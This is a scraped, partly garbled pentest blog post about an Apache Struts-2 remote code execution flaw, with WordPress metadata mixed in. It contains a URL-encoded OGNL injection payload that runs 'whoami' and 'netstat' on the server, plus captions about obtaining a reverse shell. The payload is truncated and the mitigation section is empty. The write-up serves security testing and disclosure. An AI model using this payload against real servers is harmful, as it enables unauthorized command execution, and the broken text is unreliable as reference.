![](\"https:\/\/varutra-1a3b6.kxcdn.com\/wp-content\/uploads\/2020\/11\/Blog-AMP-Images-1024x535.png\" "\\"Apache")
\nThis blog is to describe my finding on a web-based application which is a very well-known vulnerability found on Apache Struts-2 Remote Code Execution (RCE).<\/p>\n
\nThis blog is to describe my finding on a web-based application which is a very well-known vulnerability found on Apache Struts-2 Remote Code Execution (RCE).<\/p>\n
\u00a0<\/em><\/strong><\/p>\n Apache Struts is one of the popular open-source frameworks that are used mainly by banks and government organizations. It is modern, clean, elegant, but it does not provide exceptional security. The framework detected a remote code execution that allows the hacker to execute system commands remotely on any network or server that uses Apache Struts Framework along with a Rest Plugin, which is commonly used to run the application. The bug that was discovered was a vulnerability that starts with insecure deserialization but later leads to a remote execution code.<\/p>\n <\/p>\n Here are some steps that you need to follow to check for the vulnerability for Apache Struts-2.<\/p>\n ${%23a%3dnew%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22whoami<\/strong>%22}).start().getInputStream(),%23b%3dnew%20java.io.InputStreamReader(%23a),%23c%3dnew%20java.io.BufferedReader(%23b),%23d%3dnew%20char[51020],%23c.read(%23d),%23screen%3d%23context.get(\u2018com.opensymphony.xwork2.dispatcher.HttpServletResponse\u2019).getWriter(),%23screen.println(%23d),%23screen.close()}\u201d>test.action?redirect:${%23a%3dnew%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22netstat%22,%22-an%22}).start().getInputStream(),%23b%3dnew%20java.io.InputStreamReader(%23a),%23c%3dnew%20java<\/em><\/p>\n <\/p>\n <\/p>\n We offer various tailored security services to organizations to encounter their vulnerabilities and cyber-attacks. Security services like\u00a0Cloud Security<\/a>,\u00a0Network Security<\/a>,\u00a0Application Security<\/a>,\u00a0Special Security Services<\/a>, and more. You can also read about vulnerabilities and other cybersecurity attacks in our\u00a0blog section<\/a>.<\/p>\n Anyways it was FUN, Thanks for reading.<\/p>\n <\/p>\n Author,<\/p>\n Sushant Kamble<\/strong><\/p>\n This blog is to describe my finding on a web-based application which is a very well-known vulnerability found on Apache Struts-2 Remote Code Execution (RCE)….<\/p>\n","protected":false},"author":4,"featured_media":18158,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"inline_featured_image":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[57],"tags":[120],"aioseo_notices":[],"aioseo_head":"\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\tWhat is Apache Struts-2?<\/strong><\/h3>\n
Steps To Check the Vulnerability for Apache Struts-2<\/strong><\/h3>\n
\n
![\"Contrast](\"https:\/\/www.varutra.com\/wp-content\/uploads\/2020\/11\/Contrast-showing-whole-details-of-the-application.png\")
\u00a0<\/em><\/strong>Contrast showing whole details of the application<\/p>\n\n
![\"Payload](\"https:\/\/www.varutra.com\/wp-content\/uploads\/2020\/11\/Payload-resulted-with-the-hostname.png\")
<\/em><\/strong>Payload resulted in the hostname<\/p>\n\n
Setting up to gain reverse shell:<\/strong><\/h3>\n
\n
\n
![\"Reverse](\"https:\/\/www.varutra.com\/wp-content\/uploads\/2020\/11\/Reverse-shell-executed.png\")
Reverse shell executed<\/p>\nHow to Mitigate Apache Struts-2 Remote Code Execution Flaw:-<\/strong><\/h3>\n
\n
\n
\n\n![\"Sushant](\"https:\/\/lh3.googleusercontent.com\/a-\/AOh14GhvcjjAEPpTIuomhGE_Wr-dYA4HW5qiQtSZvvLr-w=s32-c-k-no\" "\\"Sushant")
<\/div>\nAttack & Pentest Team<\/em><\/div>\n<\/div>\nVarutra Consulting Pvt. Ltd.<\/div>","protected":false},"excerpt":{"rendered":"